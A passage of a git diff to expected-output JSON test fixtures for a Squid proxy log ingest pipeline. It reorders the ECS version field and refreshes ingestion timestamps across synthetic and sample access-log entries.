"2021-12-14T14:55:08.315663243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689385.714 1397 10.105.21.199 TCP_HIT/200 1742 GET http://us.js1.yimg.com/us.yimg.com/lib/hdr/ygma5.css badeyek NONE/- text/css", "event": { - "ingested": 
"2021-06-08T12:14:41.662516300Z" + "ingested": "2021-12-14T14:55:08.315663579Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.690 1977 10.105.21.199 TCP_MISS/200 14561 GET http://us.js2.yimg.com/us.js.yimg.com/lib/pim/r/dclient/d/js/uk/f7fc76100697c9c2d25dd0ec35e563b0_1.js badeyek DIRECT/213.160.98.169 application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662520100Z" + "ingested": "2021-12-14T14:55:08.315663918Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.771 80 10.105.21.199 TCP_HIT/200 68733 GET http://us.js1.yimg.com/us.yimg.com/lib/pim/r/medici/13_15/mail/ac.js badeyek NONE/- application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662523800Z" + "ingested": "2021-12-14T14:55:08.315664251Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.830 1 10.105.21.199 TCP_HIT/200 898 GET http://us.js2.yimg.com/us.js.yimg.com/lib/common/utils/2/yahoo_2.0.0-b4.js badeyek NONE/- application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662527700Z" + "ingested": "2021-12-14T14:55:08.315664575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.832 60 10.105.21.199 TCP_HIT/200 26803 GET http://us.i1.yimg.com/us.yimg.com/i/us/pim/dclient/d/img/liam_ball_1.gif badeyek NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662531500Z" + "ingested": "2021-12-14T14:55:08.315664906Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" 
diff --git a/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json
index 451ff9c6a8a..32d6f34f6f7 100644
--- a/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json
+++ b/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "10.251.224.219 7337 [29/Jan/2016:6:09:59 nto] \"PROPFIND https://example.org/exercita/der.htm?odoco=ria#min ite\" 10.234.224.44 etdo tation \"quasiarc\" liqua ciade 5699 \"https://example.net/umq/ntium.gif?nes=eab#aliqu\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230136400Z" + "ingested": "2021-12-14T14:55:10.058060954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.102.123.34 7178 [12/Feb/2016:1:12:33 nostrud] \"PURGE https://www.example.org/enderitq/sperna.txt?billoi=oreetdol#nidolor tatemU\" 10.70.36.222 estlabo doeiu \"nia\" olupt volup 208 \"https://example.com/eosquir/orsi.txt?itessequ=vol#luptat\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230156500Z" + "ingested": "2021-12-14T14:55:10.058063976Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.15.135.248 7269 [26/Feb/2016:8:15:08 mquia] \"OPTIONS https://internal.example.com/aqu/utper.jpg?eFinib=omm#iin proident\" 10.142.172.64 lupt tia \"oloremqu\" temvel iatu 5493 \"https://example.net/dolo/meumfug.gif?roinBCS=ufugiatn#tionulam\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230163200Z" + "ingested": 
"2021-12-14T14:55:10.058064427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.44.134.153 5162 [12/Mar/2016:3:17:42 nci] \"GET https://api.example.org/ceroinBC/ratvolup.gif?iatu=ionofde#con uia\" quiavo 1156 \"https://mail.example.com/consec/taliquip.html?radip=tNequ#gelit\" \"Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61\" allow 10.81.122.126 taev 160.145000", "event": { - "ingested": "2021-06-08T12:14:42.230168200Z" + "ingested": "2021-12-14T14:55:10.058064890Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.160.95.56 1980 [26/Mar/2016:10:20:16 aqui] \"PUT https://api.example.org/isetq/estqui.gif?magn=equuntu#eos enimad\" 10.171.175.51 boreet onev \"tenima\" laboreet aquaeabi 5738 \"https://api.example.net/veleumi/tia.gif?ude=maveniam#uian\" \"Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230172800Z" + "ingested": "2021-12-14T14:55:10.058065292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.175.107.139 4243 [09/Apr/2016:5:22:51 antium] \"HEAD https://www.example.org/inesci/rsitvolu.txt?pori=occ#ect reetdolo\" 10.12.195.60 uiano mrema \"autfu\" natura aboris 2946 \"https://api.example.com/ssitaspe/gitsedqu.jpg?iutal=dexe#urerep\" \"Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230176800Z" + "ingested": 
"2021-12-14T14:55:10.058065700Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.198.136.50 6875 [24/Apr/2016:12:25:25 llam] \"DELETE https://www5.example.com/ari/eataevit.txt?iam=mqua#atat quunt\" 10.207.249.121 iciade tsed \"orai\" mUt usmodte 1296 \"https://www.example.org/ametcons/porainc.jpg?temsequ=emquiavo#nonnu\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230181Z" + "ingested": "2021-12-14T14:55:10.058066082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.34.9.93 124 [08/May/2016:7:27:59 onse] \"PROPFIND https://example.org/tatno/imav.htm?ofdeF=tion#orsitame quiratio\" 10.116.120.216 qua umdo \"sed\" apariat mol 1510 \"https://internal.example.net/turveli/toccae.htm?erc=taliqu#temUten\" \"Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230184700Z" + "ingested": "2021-12-14T14:55:10.058066447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.90.131.186 6343 [22/May/2016:2:30:33 nimadmin] \"HEAD https://example.org/uaera/sitas.txt?aedic=atquovo#iumto aboreetd\" 10.30.216.41 enim saute \"vel\" quu undeo 5794 \"https://mail.example.net/atuse/ddoeiu.gif?idolore=onse#liq\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230188400Z" + "ingested": "2021-12-14T14:55:10.058066818Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.8.88.110 7618 [05/Jun/2016:9:33:08 ionul] \"CONNECT https://mail.example.org/edquiano/loru.htm?end=enia#nsequu cup\" 10.203.172.203 idestla Nemoeni \"uradi\" aborumSe luptat 6884 \"https://www5.example.org/strude/ctetura.htm?ittenbyC=aperi#lor\" \"Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230192100Z" + "ingested": "2021-12-14T14:55:10.058067185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.71.34.9 267 [20/Jun/2016:4:35:42 dolore] \"UNLOCK https://www.example.org/iqui/etc.txt?tatiset=eprehen#xercitat lpa\" 10.158.185.163 rudexerc aliq \"rsitam\" quam adm 987 \"https://www.example.org/ritatis/oloremi.txt?icab=mwr#fugi\" \"Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230195800Z" + "ingested": "2021-12-14T14:55:10.058067557Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.210.74.24 6423 [04/Jul/2016:11:38:16 untut] \"OPTIONS https://internal.example.net/ommod/sequatur.txt?tlabo=suntexp#ugiatnu stiae\" 10.201.76.240 amqu uines \"nsec\" onse emips 2655 \"https://example.net/tion/eataev.htm?uiineavo=tisetq#irati\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230199500Z" + "ingested": "2021-12-14T14:55:10.058068098Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "10.114.138.121 1939 [18/Jul/2016:6:40:50 tati] \"COPY https://api.example.org/oriosamn/deFinibu.gif?iciatisu=rehender#eporroqu uat\" 10.206.136.206 suntinc xeac \"nidolo\" tatn eli 6462 \"https://www.example.net/pida/nse.html?emeumfu=CSed#lupt\" \"Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230202900Z" + "ingested": "2021-12-14T14:55:10.058068491Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.200.199.166 3727 [02/Aug/2016:1:43:25 amvolup] \"COPY https://mail.example.org/rehend/tio.html?numqu=qui#civeli lum\" 10.134.161.118 tat ipitla \"quae\" maccusa uptat 3458 \"https://www.example.com/xerci/aqu.htm?olorema=iades#siarchi\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230206500Z" + "ingested": "2021-12-14T14:55:10.058068876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.122.46.71 2807 [16/Aug/2016:8:45:59 ihilm] \"NONE https://www.example.org/eav/ionevo.txt?siar=orev#iamquis quirat\" 10.76.3.41 isc aturve \"emulla\" mpori aaliquaU 2989 \"https://www5.example.com/ern/psaquae.html?nsectet=utla#utei\" \"Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230210400Z" + "ingested": "2021-12-14T14:55:10.058069248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.164.250.63 2530 [30/Aug/2016:3:48:33 eritqu] \"PROPFIND 
https://internal.example.net/wri/bor.jpg?hitect=dol#leumiu namali\" 10.249.213.83 nsecte itame \"eumfug\" lit asun 1250 \"https://api.example.com/oluptate/onseq.html?labore=texp#tMalor\" \"Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230214Z" + "ingested": "2021-12-14T14:55:10.058069612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.61.242.75 2591 [13/Sep/2016:10:51:07 dantiumt] \"HEAD https://api.example.net/equat/doloreme.htm?ione=ihilmole#eriamea amre\" 10.236.248.65 pisciv iquidex \"radipisc\" tmo fficiade 3280 \"https://www5.example.net/uioffi/oru.jpg?one=etMalor#ipi\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230217600Z" + "ingested": "2021-12-14T14:55:10.058070123Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.13.59.31 5685 [28/Sep/2016:5:53:42 sperna] \"PUT https://www5.example.com/estia/tper.gif?volupt=osqui#xerc iutali\" 10.214.7.83 liquide etdol \"uela\" boN eprehend 2462 \"https://internal.example.net/lamcolab/ati.jpg?gel=lorsitam#mpo\" \"Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230220900Z" + "ingested": "2021-12-14T14:55:10.058070532Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.89.201.140 2447 [12/Oct/2016:12:56:16 uamei] \"GET https://internal.example.net/sin/rvel.htm?nimid=itatione#isnis uptasn\" 10.49.92.179 osamn 
isnisiu \"bore\" tsu tcons 3128 \"https://api.example.org/lorinre/olorsita.gif?idata=rumwritt#magnid\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230224200Z" + "ingested": "2021-12-14T14:55:10.058070906Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.235.7.92 5787 [26/Oct/2016:7:58:50 nsecte] \"PURGE https://api.example.org/abo/veniamqu.gif?aliquide=ofde#equat derit\" 10.90.86.89 piscin lapar \"laboree\" tfu udan 5516 \"https://mail.example.net/xeacomm/mveleu.htm?utlabor=rau#idex\" \"Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230228100Z" + "ingested": "2021-12-14T14:55:10.058071277Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.14.211.43 4762 [10/Nov/2016:3:01:24 eiu] \"PROPFIND https://api.example.org/autfu/gnaaliq.jpg?olupta=litse#icabo itatio\" 10.14.48.16 sintoc volupt \"siste\" uiinea Utenima 1612 \"https://www5.example.net/ptatem/Nequepor.html?ugiatnu=ciati#nto\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230231500Z" + "ingested": "2021-12-14T14:55:10.058071664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.47.25.230 5491 [24/Nov/2016:10:03:59 ese] \"CONNECT https://internal.example.net/ptatemq/luptatev.html?Nequepo=ipsumd#ntocc uteirure\" 10.93.123.174 evelit reetdolo \"smo\" etcons iusmodi 1563 
\"https://example.com/uiac/epte.gif?itam=aper#santiumd\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" block", "event": { - "ingested": "2021-06-08T12:14:42.230235Z" + "ingested": "2021-12-14T14:55:10.058072035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.7.46.36 837 [08/Dec/2016:5:06:33 nonn] \"MKOL https://www5.example.net/quiavol/rrorsi.gif?iatisu=sec#cons sBon\" 10.233.48.103 leumiur tlab \"aperiame\" isc ullamcor 584 \"https://www5.example.com/tateve/itinvol.txt?tenatus=cipitlab#ipsumd\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230238400Z" + "ingested": "2021-12-14T14:55:10.058072404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.93.220.10 2805 [23/Dec/2016:12:09:07 com] \"PROPATCH https://api.example.net/orain/tiumt.jpg?litessec=itas#edquia sequatu\" 10.27.58.92 amvo qui \"tasn\" Nemoenim squirati 63 \"https://mail.example.com/nbyCic/utlabor.html?iciade=ntiumt#iquipe\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230241800Z" + "ingested": "2021-12-14T14:55:10.058072877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.213.144.249 4427 [06/Jan/2017:7:11:41 taedicta] \"PURGE https://www.example.net/str/idolore.txt?eetdolo=cteturad#untut uamni\" 10.135.217.12 metMalo ntexplic \"archite\" loreme untu 
5676 \"https://example.net/con/nisist.gif?ium=esciuntN#idunt\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230245400Z" + "ingested": "2021-12-14T14:55:10.058073248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.13.226.57 3275 [20/Jan/2017:2:14:16 runtm] \"PURGE https://mail.example.net/velitse/oditem.html?torever=oremi#mestq temUt\" 10.233.239.112 npr mquelau \"iadolor\" amcol adeser 3780 \"https://internal.example.com/tqu/reprehen.gif?quam=quid#fugiat\" \"Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230249200Z" + "ingested": "2021-12-14T14:55:10.058073623Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.161.203.252 301 [03/Feb/2017:9:16:50 emquia] \"CONNECT https://internal.example.org/isnisi/ritatise.gif?tamet=quatur#uisa eFi\" 10.21.169.127 rpori ice \"oles\" edic seq 2835 \"https://example.com/tatn/dolorsit.jpg?billo=labo#oNemoeni\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230254400Z" + "ingested": "2021-12-14T14:55:10.058073994Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.17.215.111 148 [18/Feb/2017:4:19:24 ratv] \"LOCK https://www.example.net/ianon/tsed.htm?ameiusm=proide#ano piscinge\" 10.69.139.26 ditemp edqui \"nre\" veli volupta 7124 \"https://api.example.com/ersp/enderi.jpg?adi=umwrit#uptate\" \"Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" block", "event": { - "ingested": "2021-06-08T12:14:42.230259100Z" + "ingested": "2021-12-14T14:55:10.058074363Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.10.213.83 7206 [04/Mar/2017:11:21:59 nisi] \"COPY https://www5.example.org/ncididun/umSe.jpg?ise=itau#apariat vitaedi\" 10.104.80.189 dolore onsecte \"nBCSedut\" ugiat onulam 1542 \"https://mail.example.org/oditautf/quatu.jpg?lumdolor=nonp#labo\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230263400Z" + "ingested": "2021-12-14T14:55:10.058074727Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.125.131.91 3480 [18/Mar/2017:6:24:33 urv] \"UNLOCK https://example.org/uatur/adminimv.gif?exeacom=roidents#tem dol\" 10.116.230.217 mvele isis \"uasiar\" utlab emUteni 7122 \"https://api.example.org/lor/velillu.html?dolorem=tvolu#nreprehe\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" block", "event": { - "ingested": "2021-06-08T12:14:42.230267400Z" + "ingested": "2021-12-14T14:55:10.058075098Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.26.96.202 2751 [02/Apr/2017:1:27:07 rautodi] \"ICP_QUERY https://api.example.com/ven/rQu.html?doloreme=dun#reprehe tincu\" 10.119.90.128 lor oraincid \"intocc\" amcorp ntsunt 4826 \"https://mail.example.com/olo/psumqu.txt?fdeF=iquidexe#diconse\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" cancel", "event": 
{ - "ingested": "2021-06-08T12:14:42.230271600Z" + "ingested": "2021-12-14T14:55:10.058075471Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.0.98.205 126 [16/Apr/2017:8:29:41 edquiac] \"HEAD https://api.example.net/eseru/quamest.html?qua=rsita#ate ipsamvo\" 10.76.110.144 tdol upt \"mex\" tatem untutlab 3386 \"https://mail.example.com/plicab/oremq.html?uisaute=imide#poriss\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230275400Z" + "ingested": "2021-12-14T14:55:10.058075844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.224.11.165 1646 [30/Apr/2017:3:32:16 nof] \"MOVE https://internal.example.org/mvolu/conse.txt?aincidu=nimadmin#isiu licabo\" 10.135.46.242 lupta xeaco \"nvolupt\" oremi elites 1940 \"https://www.example.org/boNemoe/onsequ.html?amvolupt=onevolu#mnis\" \"Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230279300Z" + "ingested": "2021-12-14T14:55:10.058076285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.27.44.4 4686 [14/May/2017:10:34:50 sequatD] \"TRACE https://internal.example.org/isciv/rroqu.html?uisa=tametco#ilmol eri\" 10.154.53.249 tae autodit \"elit\" cidunt plica 7398 \"https://internal.example.org/emqu/nderi.html?accusant=onse#admin\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" accept", "event": { - 
"ingested": "2021-06-08T12:14:42.230283100Z" + "ingested": "2021-12-14T14:55:10.058076654Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.93.39.140 4275 [29/May/2017:5:37:24 ute] \"COPY https://www5.example.net/uaeratv/isa.txt?periam=dqu#pid rExc\" 10.150.245.88 orisn reetd \"prehen\" ntutlabo iusmodte 1738 \"https://example.org/isc/Nequepor.txt?rem=idid#tesse\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230286900Z" + "ingested": "2021-12-14T14:55:10.058077154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.61.92.2 6595 [12/Jun/2017:12:39:58 maliquam] \"UNLOCK https://www5.example.com/orroq/vitaedic.txt?orisni=ons#remagn ecillu\" 10.73.207.70 llamco atu \"untincul\" ssecil commodi 3023 \"https://mail.example.net/tate/onevo.htm?emvele=isnost#olorem\" \"Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" block", "event": { - "ingested": "2021-06-08T12:14:42.230290600Z" + "ingested": "2021-12-14T14:55:10.058077523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.84.32.178 5271 [26/Jun/2017:7:42:33 aliq] \"GET https://example.net/mven/olorsit.gif?oremag=illu#ruredo mac\" temUt 2741 \"https://internal.example.com/uamnihi/risnis.html?scingeli=isn#sBono\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" allow 10.50.124.116 numquam 104.719000", "event": { - "ingested": 
